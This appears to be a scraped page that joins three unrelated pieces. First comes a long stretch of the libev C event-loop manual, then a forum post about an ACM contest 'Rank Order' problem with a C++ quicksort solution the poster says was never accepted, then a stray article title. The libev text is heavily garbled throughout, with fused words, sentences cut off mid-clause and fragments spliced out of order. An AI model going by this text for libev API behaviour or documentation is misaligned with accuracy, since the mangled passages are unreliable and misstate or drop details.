Destroys an event loop object (frees all memory and kernel state etc.). None of the active event watchers will be stopped in the normal sense, so e.g.
ev_is_activemight still return true. It is your responsibility to either stop all watchers cleanly yourself before calling this function, or cope with the fact afterwards (which is usually the easiest thing, you can just ignore the watchersand
ev_loop_destroy.
- ev_loop_fork (loop)
This function sets a flag that causes subsequent
ev_runiterations to reinitialise the kernel state for backends that have one. Despite the name, you can call it anytime,*,
epoll
ev_loop_forkand happily wraps around with enough iterations.
This value can sometimes be useful as a generation counter of sorts (it "ticks" the number of loop iterations), as it roughly corresponds with
ev_prepareand
ev_checkcalls - and is incremented between the prepare and check phases.
- unsigned int ev_depth (loop)
Returns the number of times
ev_runwas entered minus the number of times
ev_runwas exited normally, in other words, the recursion depth.
Outside
ev_run, this number is zero. In a callback, this number is
1, unless
ev_runwas invoked recursively (or from another thread), in which case it is higher.
Leaving
ev_runabnormsection.
- ev_suspend (loop)
-
- ev_resume (loop)
These two functions suspend and resume an event
ev_suspendin your
SIGTSTPhandler, sending yourself a
SIGSTOPand calling
ev_resumedirectly afterwards to resume timer processing.
Effectively, all
ev_timerwatchers will be delayed by the time spend between
ev_suspendand
ev_resume, and all
ev_periodicwatchers will be rescheduled (that is, they will lose any events that would have occurred while suspended).
After calling
ev_suspendyou must not call any function on the given loop other than
ev_resume, and you must not call
ev_resumewithout a previous call to
ev_suspend.
Calling
ev_suspend/
ev_resumehas the side effect of updating the event loop time (see
ev_now_update).
- loops.
If the flags argument is specified as
0, it will keep handling events until either no event watchers are active anymore or
ev_breakwas called.
The return value is false if there are no more active watchers (which usually means "all jobs done" or "deadlock"), and true in all other cases (which usually means " you should call
ev_runagain").
Please note that an explicit
ev_break mostly exception-safe - you can break out of a
ev_runcall by calling
longjmpin a callback, throwing a C++ exception and so on. This does not decrement the
ev_depthvalue, nor will it clear any outstanding
EVBREAK_ONEbreaks.
A flags value of
EVRUN_NOWAITwill
EVRUN_ONCEwill
ev_run"). However, a pair of
ev_prepare/
ev_checkwatchers is usually a better approach for this kind of thing.
Here are the gory details of what
ev_rundoes !
- ev_break (loop, how)
Can be used to make a call to
ev_runreturn early (but only after it has processed all outstanding events). The
howargument must be either
EVBREAK_ONE, which will make the innermost
ev_runcall return, or
EVBREAK_ALL, which will make all nested
ev_runcalls return.
This "break state" will be cleared on the next call to
ev_run.
It is safe to call
ev_breakfrom outside any
ev_runcalls,will not return on its own.
This is useful when you have a watcher that you never intend to unregister, but that nevertheless should not keep
ev_runfrom returning. In such a case, call
ev_unrefafter starting, and
ev_refbefore stopping it.
As an example, libev itself uses this for its internal signal pipe: It is not visible to the libev user and should not keep
ev_runfrom_refin the callback).
Example: Create a signal watcher, but keep it from keeping
ev_runrunning);
-must_iowatchers will not be affected. Setting this to a non-null value will not introduce any overhead in libev.
Many (busy) programs can usually benefit by setting the I/O collect interval to a value near
0.1or so, which is often enough for interactive servers (of course not for games), likewise for timeouts. It usually doesn't make much sense to set it to a lower value than
ev_periodicwat);
- ev_invoke_pending (loop)
This call will simply invoke all pending watchers while resetting their pending state. Normally,
ev_rundoes
ev_invoke_pendingor
ev_runofwill call this callback instead. This is useful, for example, when you want to invoke the actual watchers inside another context (another thread etc.).
If you want to reset the callback, use
ev_invoke_pendingas new callback.
-,
ev_runcan run an indefinite time, so it is not feasible to wait for it to return. One way around this is to wake up the event loop via
ev_breakand
ev_async_send, another way is to set these release and acquire callbacks on the loop.
When set, then
releasewill be called just before the thread is suspended waiting for new events, and
acquireis called just afterwards.
Ideally,
releasewill just call your mutex_unlock function, and
acquirewill just call the mutex_lock function again.
While event loop modifications are allowed between invocations of
releaseand
acquire(that's their only purpose after all), no modifications done will affect the event loop, i.e. adding watchers will have no effect on the set of file descriptors being watched, or the time waited. Use an
ev_asyncwatcher to wake up
ev_runwhen you want it to take note of any changes you made.
In theory, threads executing
ev_runwill be async-cancel safe between invocations of
releaseand
acquire.
See also the locking example in the
THREADSsection later in this document.
- ev_set_userdata (loop, void *data)
-
- void *ev_userdata (loop)
Set and retrieve a single
void *associated with a loop. When
ev_set_userdatahas never been called, then
ev_userdatareturns
0.
These two functions can be used to associate arbitrary data with a loop, and are intended solely for the
invoke_pending_cb,
releaseand
acquirecallbacks described above, but of course can be (ab-)used for any other purpose as well.
- ev_verify (loop)
This function only does something when
EV_VERIFYsupport
ev_TYPE_set (watcher *, ...) macro to configure it, with arguments specific to_iowatcher has become readable and/or writable.
EV_TIMER
The
ev_timerwatcher has timed out.
EV_PERIODIC
The
ev_periodicwatcher has timed out.
EV_SIGNAL
The signal specified in the
ev_signalwatcher has been received by a thread.
EV_CHILD
The pid specified in the
ev_childwatcher has received a status change.
EV_STAT
The path specified in the
ev_statwatcher changed its attributes somehow.
EV_IDLE
The
ev_idlewatcher has determined that you have nothing better to do.
EV_PREPARE
-
EV_CHECK
All
ev_preparewatchers are invoked just before
ev_runstarts to gather new events, and all
ev_checkwatchers are queued (not invoked) just after
ev_runhas gathered them, but before it queues any callbacks for any received events. That means
ev_preparewatchers are the last watchers invoked before the event loop sleeps or polls for new events, and
ev_checkwat
ev_preparewatcher might start an idle watcher to keep
ev_runfrom blocking).
EV_EMBED
The embedded event loop specified in the
ev_embedwatcher
ev_init(ev_TYPE *watcher, callback)
This macro initialises the generic portion of a watcher. The contents of the watcher object can be arbitrary (so
mallocwill do). Only the generic parts of the watcher are initialised, you need to call the type-specific
ev_TYPE_setmacro afterwards to initialise the type-specific parts. For each type there is also a
ev_TYPE_initmacro_iowatcher in two steps.
ev_io w; ev_init (&w, my_cb); ev_io_set (&w, STDIN_FILENO, EV_READ);
ev_TYPE_set(ev_TYPE *watcher, [args])
This macro initialises the type-specific parts of a watcher. You need to call
ev_initat least once before you call this macro, but you can call
ev_TYPE_setany number of times. You must not, however, call this macro on a watcher that is active (it can be pending, however, which is a difference to the
ev_initmacro).
Although some watcher types do not have type-specific arguments (e.g.
ev_prepare) you still need to call its
setmacro.
See
ev_init, above, for an example.
ev_TYPE_init(ev_TYPE *watcher, callback, [args])
This convenience macro rolls both
ev_initand
ev_TYPE_setmacro calls into a single call. This is the most convenient method to initialise a watcher. The same limitations apply, of course.
Example: Initialise and set an
ev_iowatcher_iowatcher that is being abused as example in this whole section.
ev_io_start (EV_DEFAULT_UC,
ev_TYPE_stopensures that the watcher is neither active nor pending. If you want to free or reuse the memory used by the watcher it is therefore a good idea to always call its
ev_TYPE_stopfunction.
- bool ev_is_active (ev_TYPE *watcher)
Returns a true value iff the watcher is active (i.e. it has been started and not yet been stopped). As long as a watcher is active you must not modify it.
-
ev_TYPE_setwatchers).
If you need to suppress invocation when higher priority events are pending you need to look at
ev_idlewatchers, which provide this functionality.
You must not change the priority of a watcher as long as it is active or pending.
Setting a priority outside the range of
EV_MINPRIto
EV_MAXPRIwith the given
loopand
revents. Neither
loopnor
reventsneedbitset (as if its callback was invoked). If the watcher isn't pending it does nothing and returns
0.
Sometimes it can be useful to "poll" a watcher instead of waiting for its callback to be invoked, which can be accomplished with this function.
-
ev_clear_pendingwill clear the pending event, even if the watcher was not started in the first place.
See also
ev_feed_fd_eventand
ev_feed_signal_eventfor related functions that do not need a watcher.
See also the "ASSOCIATING CUSTOM DATA WITH A WATCHER" and "BUILDING YOUR OWN COMPOSITE WATCHERS" idioms.
WATCHER STATES
Therefollowed by the watcher-specific
ev_TYPE_setfunction.
In this state it is simply some block of memory that is suitable for use in an event loop. It can be moved around, freed, reused etc. at will - as long as you either keep the memory contents intact, or call
ev_TYPE_initagain.
- started/running/active
Once a watcher has been started with a call to
ev_TYPE_start
ev_feed_event), in which case it becomes pending without being active.
- stopped
A watcher can be stopped implicitly by libev (in which case it might still be pending), or explicitly by calling its
ev_TYPE_stopfunction.
ev_TYPE_initit again).
WATCHER PRIORITY MODELS
Many event loops support watcher priorities, which are usually small integers that influence the ordering of event callback invocation between watchers in some way, all else being equal.
In libev, Watcher priorities can be set using
ev_io watcher to receive data, and an associated.
WATCHER TYPES
EV_READ but a subsequent
read(2) will actually block because there is no data.
SIGALRM and an interval timer, just to be sure you won't block indefinitely.
But really, best use non-blocking mode.
The special problem of disappearing file descriptors
Some backends (e.g. kqueue, epoll),
epoll on Linux works with /dev/random but not.
The special problem of fork_iowatcher. The
fdis the file descriptor to receive events for and
eventsis either
EV_READ,
EV_WRITEor
EV_READ | EV_WRITE, to express the desire to receive the given events.
- int fd [read-only]
The file descriptor being watched.
- int events [read-only]
The events being watched.
Examples
Example: Call after its timeout has passed (not
ev_run recursively).,
ev_timer_stop.
- 2. Use a timer and re-start it with
ev_timer_againinactivity.
This is the easiest way, and involves using
ev_timer_againinstead of
ev_timer_start.
To implement this, configure an
ev_timerwith a
repeatvalue of
60and then call
ev_timer_againat start and each time you successfully read or write some data. If you go into an idle state where you do not expect data to travel on the socket, you can
ev_timer_stopthe timer, and
ev_timer_againwill automatically restart it if need be.
That means you can ignore both the
ev_timer_startfunction and the
afterargument to
ev_timer_set, and only ever use the
repeatmember
ev_timeralone,,
last_activity + timeout, and subtracting the current time,
last_activityto end of the list.
Then use an
ev_timerto..);
If the event loop is suspended for a long time, you can also force an update of the time returned by
ev_now () by calling
ev_now_update ().,
ev_periodics,seconds. If
repeatis
0., then it will automatically be stopped once the timeout is reached. If it is positive, then the timer will automatically be configured to trigger again
repeatseconds.
- ev_timer_again (loop, ev_timer *)
This will act as if the timer timed out, and restarts it again if it is repeating. It basically works like calling
ev_timer_stop, updating the timeout to the
repeatvaluevaluereturns
5. When the timer is started and one second passes,
ev_timer_remainingwill return
4. When the timer expires and is restarted, it will return roughly
7(likely slightly less as callback invocation takes some time, too), and so on.
- ev_tstamp repeat [read-write]
The current
repeatvalue. Will be used each time the watcher times out or
ev_timer_againis called, and determines the next timeout (if any), which is also when any modifications are taken into account., periodic watchers are not based on real time (or relative time, the physical time that passes) but on wall clock time (absolute time, the thing you can read on your calender.has
offset + N * intervaltime (for some integer N, which can also be negative) and then repeat, regardless of any time jumps. The
offsetargument is merely an offset into the
intervalperiods.
This can be used to create timers that do not drift with respect to the system clock, for example, here is an
ev_periodicthat
ev_periodicwill try to run the callback in this mode at the next possible time where
time = offset (mod interval), regardless of any time jumps.
The
intervalMUST be positive, and for numerical stability, the interval value should be higher than
1/8192(which is around 100 microseconds) and
offsetshould be higher than
0and should have at most a similar magnitude as the current time (say, within a factor of ten). Typical values for offset are, in fact,
0or something between
0and
interval, which is also the recommended range.
Note also that there is an upper limit to how often a timer can fire (CPU speed for example), so if
intervaland
offsetarewatcher, which is the only event loop modification you are allowed to do).
The callback prototype higher than or equal to the passed
nowvalue.
This can be used to create very complex timers, such as a timer that triggers on "next midnight, local time". To do this, you would calculate the next midnight after
nowand return the timestamp value for this. How you do this is, again, up to you (but it is not trivial, which is the main reason I omitted it as an example).
-).
- ev_tstamp ev_periodic_at (ev_periodic *)
When active, returns the absolute time that the watcher is supposed to trigger next. This is not the same as the
offsetargument to
ev_periodic_set, but indeed works even in interval and manual rescheduling modes.
- ev_tstamp offset [read-write]
When repeating, this contains the offset value, otherwise this is the absolute point in time (the
offsetvalue passed to
ev_periodic_set, although libev might modify this value for better numerical stability).
Can be modified any time, but changes only take effect when the periodic timer fires or
ev_periodic_againis being called.
- ev_tstamp interval [read-write]
The current interval value. Can be modified any time, but changes only take effect when the periodic timer fires or
ev_periodic_againis being called.constants).
- int signum [read-only]
pidis specified as
0). The callback can look at the
rstatusmember of the
ev_childwatcher structure to see the status word (use the macros from
sys/wait.hand see your systems
waitpiddocumentation). The
rpidmember contains the pid of the process causing the status change.
tracemustand
sys/wait.hdocumentation for details).
Examples
Example:); }is a hint on how quickly a change is expected to be detected and should normally be specified as
0to let libev choose a suitable value. The memory pointed to by
pathmust point to the same path for as long as the watcher is active.
The callback will receive an
EV_STATeventtypes suitable for your system, but you can only rely on the POSIX-standardised members to be present. If the
st_nlinkmember is
0, then there was some error while
stating
ev_stat callback invocationmacro, but using it is utterly pointless, believe me.
Examples
Example: Dynamically allocate);
ev_prepare and
ev_check - customise your event loop!
Prepare and check watchers are often (but not always) used in pairs: prepare watchers get invoked before the process blocks and check watchers afterwards.
You must not call
ev_runand
ev_check_setmacros,,
poll and then
kevent, but at least you can use both mechanisms for what they are best:
kqueue for scalable sockets will
loop_socket. (One might optionally use
ev_fork - the audacity to resume the event loop after a fork
Fork watchers are called when a
fork () was detected (usually because whoever is a good citizen cared to tell libev about it by calling.macro, but using it is utterly pointless, really.
ev_cleanup - even the best things end
Cleanup watchers are called just before the event loop is being destroyed by a call
ev_cleanup_start.
Watcher-Specific Functions and Data Members
- ev_cleanup_init (ev_cleanup *, callback)
Initialises and configures the cleanup watcher - it has no parameters of any kind. There is a
ev_cleanup_setmacro,
pthread_setmaskinstead of
sigprocmaskwhen you use threads, but libev doesn't do it either...).
-); }
Watcher-Specific Functions and Data Members
- ev_async_init (ev_async *, callback)
Initialises and configures the async watcher - it has no parameters of any kind. There is a
ev_async_setmacro, but using it is utterly pointless, trust me.
- ev_async_send (loop, ev_async *)
Sends/signals/activates the given
ev_asyncwatcher, that is, feeds an
EV_ASYNCevent on the watcher into the event loop, and instantly returns.
Unlike
ev_feed_event, this call is safe to do from other threads, signal or similar contexts (see the discussion of
EV_ATOMIC_Tin the embedding section below on what exactly this means).
Note that, as with other watchers in libev, multiple events might get compressed into a single callback invocation (another way to look at this is that
ev_asyncwatchers are level-triggered: they are set.
- bool = ev_async_pending (ev_async *)
Returns a non-zero value when
ev_async_sendhas been called on the watcher but the event has not yet been processed (or even noted) by the event loop.
ev_async_sendsets a flag in the watcher and wakes up the loop. When the loop iterates next and checks for the watcher to have become active, it will reset the flag again.
ev_async_pendingcan
There are some other functions of possible interest. Described. Here. Now.
- ev_once (loop, int fd, int events, ev_tstamp timeout, callback)
fdis less than 0, then no I/O watcher will be started and the
eventsargument is being ignored. Otherwise, an
ev_iowatcher for the given
fdand
eventsset will be created and started.
If
timeoutis less than 0, then no timeout watcher will be started. Otherwise an
ev_timerwatcher with after =
timeout(and repeat = 0) will be started.
0is a valid timeout.
The callback has the type
void (*cb)(int revents, void *arg)and is passed an
reventsset like normal event callbacks (a combination of
EV_ERROR,
EV_READ,
EV_WRITEor
EV_TIMER) and the
argvalue)
This section explains some common idioms that are not immediately obvious. Note that examples are sprinkled over the whole manual, and this section only contains stuff that wouldn't fit anywhere else.
ASSOCIATING CUSTOM DATA WITH A WATCHER
Each watcher has, by default,
my_biggy is a bit more complicated: Either you store the address of your
my_biggy struct in the
data member of the watcher (for woozies or C++ coders), or you need to use some pointer arithmetic using)); }
AVOIDING FINISHING BEFORE RETURNING
Often (especially in GUI toolkits) there are places where you have modal interaction, which is most easily implemented by recursively invoking
ev_run.
This brings the problem of exiting - a callback might want to finish the main
ev_break will not work.
The solution is to maintain "break this loop" variable for each
ev_run invocation, and use a loop around
ev_run until the condition is triggered, using;
THREAD LOCKING EXAMPLE
Here is a fictitious example of how to run an event loop in a different thread from where callbacks are being invoked and watchers are created/added/removed.
For a real-world example, see
l_release
l_invoke callback will signal the main thread via some unspecified mechanism (signals? pipe writes?
ev_async watcher is required because otherwise an event loop currently blocking in the kernel will have no knowledge about the newly added timer. By waking up the loop it will pick up any new watchers in the next event loop iteration.
; "EMBEDDING", but in short, it's easiest to create two files, my_ev.h my_ev.h when you would normally use ev.h, and compile my_ev.c into your project. When properly specifying include paths, you can even use ev.h as header file name directly.
LIBEVENT EMULATION
Lib
ev namespace:
ev::READ,
ev::WRITEetc.
These are just enum values with the same values as the
EV_READetc. macros from ev.h.
ev::tstamp,
ev::now
Aliases to the same types/functions as with the
ev_prefix.
ev::io,
ev::timer,
ev::periodic,
ev::idle,
ev::sigetc.
For each
ev_TYPEwatcher in ev.h there is a corresponding class of the same name in the
evnamespace, with the exception of
ev_signalwhich is called
ev::sigto avoid clashes with the
signalmacro defined by many implementations.
All of those classes have these methods:
- ev::TYPE::TYPE ()
-
- ev::TYPE::TYPE (loop)
-
- ev::TYPE::~TYPE
The constructor (optionally) takes an event loop to associate the watcher with. If it is omitted, it will use
EV_DEFAULT.
The constructor calls
ev_initfor you, which means you have to call the
setmethod before starting it.
It will not set a callback, however: You have to call the templated
setmethodas second. The object must be given as parameter and is stored in the
datamember of the watcher.
This method synthesizes efficient thunking code to call your method from the C callback that libev requires. If your compiler can inline your callback (i.e. it is visible to it at the place of the
setcall);
-aboveargument will be stored in the watcher's
datamember and is free for you to use.
The prototype of the
functionmust be
void (*)(ev::TYPE &w, int).
See the method-
setabove for more details.
Example: Use a plain function as callback.
static void io_cb (ev::io &w, int revents) { } iow.set <io_cb> ();
- w->set (loop)
Associates a different
struct ev_loopwith this watcher. You can only do this when the watcher is inactive (and not pending either).
- w->set ([arguments])
Basically the same as
ev_TYPE_set(except for
ev::embedwatchers>), with the same arguments. Either this method or a suitable start method must be called at least once. Unlike the C counterpart, an active watcher gets automatically stopped and restarted when reconfiguring it with this method.
For
ev::embedwatchers this method is called
set_embed, to avoid clashing with the
set (loop)method.
- w->start ()
Starts the watcher. Note that there is no
loopargument, as the constructor already stores the event loop.
- w->start ([arguments])
Instead of calling
setand
startmethods separately, it is often convenient to wrap them in one call. Uses the same type of arguments as the configure
setmethod of the watcher.
- w->stop ()
Stops the watcher if it is active. Again, no
loopargument.
- w->again () (
ev::timer,
ev::periodiconly)
For
ev::timerand
ev::periodic, this invokes the corresponding
ev_TYPE_againfunction.
- w->sweep () (
ev::embedonly)
Invokes
ev_embed_sweep.
- w->update () (
ev::statonly)
Invokes
ev_stat_stat. } };
OTHER LANGUAGE BINDINGS
Libis preferred nowadays),
Net::SNMP(
Net::SNMP::EV) and the
libglibevent core (
Glib::EVmakesand
ev_timer), to be found at.
- Javascript
Node.js () uses libev as the underlying event library.
- Others
There are others, and I stopped counting.
MACRO MAGIC
Libev can be compiled with a variety of options, the most fundamental of which is
EV_MULTIPLICITY. This option determines whether form is used when this is the sole argument,
EV_A_is used when other arguments are following. Example:
ev_unref (EV_A); ev_timer_add (EV_A_ watcher); ev_run (EV_A_ 0);
It assumes the variable
loopof type
struct ev_loop *is in scope, which is often provided by the following macro.
EV_P,
EV_P_
This provides the loop parameter for functions, if one is required ("ev loop parameter"). The
EV_Pformof type
struct ev_loop *, quite suitable for use with
EV_A.
EV_DEFAULT,.
EV_DEFAULT_UC,
EV_DEFAULT_UC_
Usage identical to
EV_DEFAULTand
EV_DEFAULT_, but requires that the default loop has been initialised (
UC== unchecked). Their behaviour is undefined when the default loop has not been initialised by a previous execution of
EV_DEFAULT,
EV_DEFAULT_or
ev_default_init (...).
It is often prudent to use
EV_DEFAULTwhen initialising the first watcher in a function but use
EV_DEFAULT_UCafterwards.).
FILESETS
Depending on what features you need you need to include one or more sets of files in your application.
CORE EVENT LOOP.
LIBEVENT COMPATIBILITY API
AUTOCONF SUPPORTto
0when compiling your sources. This has the additional advantage that you can drop the
structfrom
struct ev_loopdeclarations, as libev will provide an
ev_looptypedef in that case.
In some future version, the default for
EV_COMPAT3will become
0, and in some even more future version the compatibility code will be removed completely.
- EV_STANDALONE (h)
Must always be
1if.function is not available will fail, so the safe default is to not enable this.
- EV_USE_MONOTONIC
If defined to
clock_gettimefunctionbyfunction. This option exists because on GNU/Linux,
clock_gettimeis in
librt, but
librtunconditionally pulls in
libpthread, slowing down single-threaded programs needlessly. Using a direct syscall is slightly slower (in theory), because no optimised vdso implementation can be used, but avoids the pthread dependency. Defaults to
1
- EV_USE_EVENTFD
If defined to be
1, then libev will assume that
eventfd ()is available and will probe for kernel support at runtime. This will improve
ev_signaland
ev_asyncperformance will be done: if no other method takes over, select will be it. Otherwise the select backend will not be compiled in.
- EV_SELECT_USE_FD_SET
If defined to
1, then the select backend will use the system
fd_setstructure. This is useful if libev doesn't compile due to a missing
NFDBITSor
fd_maskdefinition or it mis-guesses the bitset layout on exotic systems. This usually limits the range of file descriptors to some low limit such as 1024 or might have other limitations (winsocket only allows 64 sockets). The
FD_SETSIZEmacro, set before compilation, configures the maximum size of the
fd_set.
- EV_SELECT_IS_WINSOCKETon the fd to convert it to an OS handle. Otherwise, it is assumed that all these functions actually work on fds, even on win32. Should not be defined on non-win32 platforms.
- EV_FD_TO_WIN32_HANDLE(fd)
If
EV_SELECT_IS_WINSOCKETOCKETthen libev maps handles to file descriptors using the standard
_open_osfhandlefunction.function, useful to unregister file descriptors again. Note that the replacement function has to close the underlying OS handle.
- EV_USE_WSASOCKET
If defined to be
1, libev will use
WSASocketto create its internal communication socket, which works better in some environments. Otherwise, the normal
socketfunction will be used, which works better in other environments.
- EV_USE_POLL
If defined to be
1, libev will compile in support for the
poll(2) backend. Otherwise it will be enabled on non-win32 platforms. It takes precedence over select.
- EV_USE_EPOLL
If defined to be
1, libev will compile in support for the Linux.
- EV_USE_KQUEUE.
- EV_USE_PORT
If defined to be
1, libev will compile in support for the Solaris 10 port style backend. Its availability will be detected at runtime, otherwise another method will be used as fallback. This is the preferred backend for Solaris 10 systems.
- EV_USE_DEVPOLL
Reserved for future expansion, works like the USE symbols above.
- EV_USE_INOTIFY
If defined to be
1, libev will compile in support for the Linux inotify interface to speed up
ev_statwatwatisnand
EV_DEFAULT_will no longer provide a default loop when multiplicity is switched off - you always have to initialise the loop manually in this case.
- EV_MINPRI
-
- EV_MAXPRI
The range of allowed priorities.
EV_MINPRImust be smaller or equal to
EV_MAXPRI, but otherwise there are no non-obvious limitations. You can provide for more priorities by overriding those symbols (usually defined to be
-2
0will):
1- faster/larger code
Use larger code to speed up some operations.
Currently this is used to override some inlining decisions (enlarging the code size by roughly 30% on amd64).
When optimising for size, use of compiler flags such as
-Oswith gcc is recommended, as well as
-DNDEBUG, as libev contains a number of assertions.
The default is off when
__OPTIMIZE_SIZE__is defined by your compiler (e.g. gcc with
-Os).
_forto
1instead.
32- enable all backends
This enables all backends - without this feature, you need to enable at least one backend manually (
EV_USE_SELECTis a good choice).
64- enable OS-specific "helper" APIs
Enable inotify, eventfd, signalfd and similar OS-specific helper APIs by default.
Compiling with
gcc -Os -DEV_STANDALONE -DEV_USE_EPOLL=1 -DEV_FEATURES=0reduces
-Wl,--gc-sections -ffunction-sections) functions unused by your program might be left out as well - a binary starting a timer and an I/O watcher then might come out at only 5Kb.
-
EV_API_STATICand include ev.c in the file that wants to use libev.
This option only works when libev is compiled with a C compiler, as C++ doesn't support the required declaration syntax.
- EV_AVOID_STDIO
If this is set to
1.
- EV_NSIG
The highest supported signal number, +1 (or, the number of signals): Normally, libev tries to deduce the maximum number of signals automatically, but sometimes this fails, in which case it can be specified. Also, using a lower number than detected (
32should be good for about any system in existence) can save some memory, as libev statically allocates some 12-24 bytes per signal number.
- EV_PID_HASHSIZE
ev_childwatchers use a small hash table to distribute workload by pid. The default size is
16(or
1with
EV_FEATURESdisabled), usually more than enough. If you need to manage thousands of children you might want to increase this value (must be a power of two).
- EV_INOTIFY_HASHSIZE
ev_statwatchers use a small hash table to distribute workload by inotify watch id. The default size is
16(or
1with
EV_FEATURESdisabled), usually more than enough. If you need to manage thousands of
ev_statwatoverr_ATto
1), which uses 8-12 bytes more per watcher and a few hundred bytes more code, but avoids random read accesses on heap changes. This improves performance noticeably with many (hundreds) of watchers.
The default is
1, unless
EV_FEATURESoverroverrides it, in which case it will be
0.
- EV_COMMON
By default, all watchers have a
void *datamember. ";" */
- EV_CB_DECLARE (type)
-
- EV_CB_INVOKE (watcher, revents)
-
- ev_set_cb (ev, cb)++.
EXPORTED API SYMBOLS
If ev_cpp.C implementation file that contains libev proper and is compiled:
#include "ev_cpp.h" #include "ev.c"
INTERACTION WITH OTHER PROGRAMS, LIBRARIES OR THE ENVIRONMENT
THREADS AND COROUTINES:watchers can be used to wake them up from other threads safely (or from signal contexts...).
An example use would be to communicate signals or other events that only work in the default loop by registering the signal watcher with the default loop and triggering an
ev_asyncwatcher..
PORTABILITY NOTES
GNU/LINUX 32 BIT LIMITATIONS
GNU/Linux is the only common platform that supports 64 bit file/large file interfaces but disables them by default.
That means that libev compiled in the default environment doesn't support files larger than 2GiB or so, which mainly affects.
OS/X AND DARWIN BUGS
The whole thing is a bug if you ask me - basically any system interface you touch is broken, whether it is locales, poll, kqueue or even the OpenGL drivers.
kqueue.
LIBEV_FLAGS=3 to only allow
poll and
select backends.
AIX POLL BUG
General issues
Win32 doesn't support any of the standards (e.g. POSIX) that libev requires, and its I/O model is fundamentally incompatible with the POSIX model. Libev still offers limited functionality on this platform in the form of.
PORTABILITY REQUIREMENTS
In addition to a working ISO-C implementation and of course the backend-specific APIs, libev relies on a few additional extensions:
void (*)(ev_watcher_type *, int revents)must have compatible calling conventions regardless
ev_watcher *internally.
- pointer accesses must be thread-atomicto temporarily block signals. This is not allowed in a threaded program (
pthread_sigmaskhas to be used). Typical pthread implementations will either allow
sigprocmaskin the "main thread" or will block signals process-wide, both behaviours would be compatible with libev. Interaction between
sigprocmaskand
pthread_sigmaskcouldinternally instead of
size_twhen allocating its data structures. On non-POSIX systems (Microsoft...) this might be unexpectedly low, but is still at least 31 bits everywhere, which is enough for hundreds of millions of watchers.
doublemust hold a time value in seconds with enough accuracy
The type
double
long doubleor something like that, just kidding).
If you know of other additional requirements drop me a note.
ALGORITHMIC COMPLEXITIES.
-
ev_io_setwascalls in the current loop iteration and the loop is currently blocked. Checking for async and signal events involves iterating over all running async watchers or all signal numbers.
PORTING FROM LIBEV 3.X TO 4.Xcounterparts:
ev_loop_destroy (EV_DEFAULT_UC); ev_loop_fork (EV_DEFAULT);
-
struct ev_loopobjects don't have an
ev_loop_prefix, so it was removed;
ev_loop,
ev_unloopand associated constants have been renamed to not collide with the
struct ev_loopanymore and
EV_TIMERnow follows the same naming scheme as all other watcher types. Note that
ev_loop_forkis still called
ev_loop_forkbecause it would otherwise clash with the
ev_forktypedef.
EV_MINIMALmechanism replaced by
EV_FEATURES
The preprocessor symbol
EV_MINIMALhas been replaced by a different mechanism,
EV_FEATURES. Programs using
EV_MINIMALusually compile and work, but the library code will of course be larger.
GLOSSARY
-.
AUTHOR
Marc Lehmann <libev@schmorp.de>, with repeated corrections by Mikael Magnusson and Emanuele Giaquinta, and minor corrections by many others. | https://metacpan.org/pod/release/MLEHMANN/EV-4.16/libev/ev.pod | CC-MAIN-2017-22 | refinedweb | 6,421 | 54.52 |
Hello, all!
First off, this is program from the ACM programming contest, of which today I and two teammates competed. We managed to solve two of nine correctly, but sadly the two programs I was responsible for were never accepted.
I am hoping that someone here can help me understand what I overlooked. Don't worry, the contest is over, so you are not helping me cheat. We had no access to the internet during the contest.
The program I will focus on in this thread is as follows:
Rank Order
Your team has been retained by the director of a competition who supervises a panel of judges. The competition asks the judges to assign integer scores to competitors -- the higher the score, the better. Although the event has standards for what score values mean, each judge is likely to interpret those standards differently. A score of 100, say, may mean different things to different judges.
The director's main objective is to determine which competitors should receive prizes for the top positions. Although absolute scores may differ from judge to judge, the director realizes that relative rankings provide the needed information -- if two judges rank the some competitors first, second, third, ... then they agree on who should receive the prizes.
Your team is to write a program to assist the director by comparing the scores of pairs of judges. The program is to read two lists of integer scores in competitor order and determine the highest ranking place (first place being highest) at which the judges disagree.
Input
Input to your program will be a series of score list pairs. Each pair begins with a single integer giving the number of competitors N, 1 < N < 1,000,000. The next N integers are the scores from the first judge in competitor order. The are followed by the second judge's scores -- N more integers, also in competitor order. Scores are in the range 0 to 100,000,000 inclusive. Judges are not allowed to give ties, so each judge's scores will be unique. Values are separated from each other by one or more spaces and/or newlines. The last score list pair is followed by the end-of-file indicator.
Output
For each score pair, print a line with the integer representing the highest-ranking place at which the judges do not agree. If the judges agree on ever place, print a line containing only the word 'agree'. Use the format below: "Case", one space, the case number, a colon and one space, and the answer for that case with no trailing spaces.
Sample Input
4
3 8 6 2
15 37 17 3
8
80 60 40 20 10 30 50 70
160 100 120 80 20 60 90 135
Sample Output
Case 1: agree
Case 2: 3
The following is (roughly, I'm retyping now my memory):
The logic is fairly simple:The logic is fairly simple:Code:#include <iostream> using namespace std; struct contestant { int score, cont_num; }; void swap( contestant a[], int i, int j ); void qsort( contestant a[], int left, int right ); int num_of_conts; int case_num = 1; int main(){ cin >> num_of_conts; while( cin ) { contestant * judge1 = new contestant[num_of_conts]; // list for each judges scores contestant * judge2 = new contestant[num_of_conts]; // same index means same contestant, just score from diff judge for( int i = 0; i < num_of_conts; i++ ) { cin >> judge1[i].score; judge1[i].cont_num = i; } for( int i = 0; i < num_of_conts; i++ ) { cin >> judge2[i].score; judge2[i].cont_num = i; } // sort both arrays of contestants by score, from lowest score to highest qsort( judge1, 0, num_of_conts - 1 ); qsort( judge2, 0, num_of_conts - 1 ); int i; for( i = num_of_conts - 1; i >= 0; i-- ) if( judge1[i].cont_num != judge2[i].cont_num ) break; cout << "Case " << case_num++ << ": "; if( i == -1 ) cout << "agree" << endl; else cout << num_of_conts - i << endl; delete [] judge1; delete [] judge2; cin >> num_of_conts; } return 0; } void swap( contestant a[], int i, int j ) { contestant temp = a[i]; a[i] = a[j]; a[j] = temp; } void qsort( contestant a[], int left, int right ) { int i, last; if( left >= right ) return; swap( a, left, ( left + right ) / 2 ); last = left; for( i = left + 1; i <= right; i++ ) if( a[i].score < a[left].score ) swap( a, ++last, i ); swap( a, left, last ); qsort( a, left, last - 1 ); qsort( a, last + 1, right ); }
*chug in the scores
*sort contestants based on scores
*iterate along the list of contestants, from best to worst, breaking on
mismatch
The judges never accepted any iteration of this code. All I could think of doing was switching most/all the ints to long and then long longs in case of any overflows.
Any thoughts on why it was never accepted? | https://cboard.cprogramming.com/cplusplus-programming/164914-acm-programming-contest-seeking-answers-post1216794.html?s=63e6ffd83e37f4cdd6d82b4e00257f9e | CC-MAIN-2020-05 | refinedweb | 781 | 64.85 |
Using Predictive Power Score to Pinpoint Non-linear Correlations
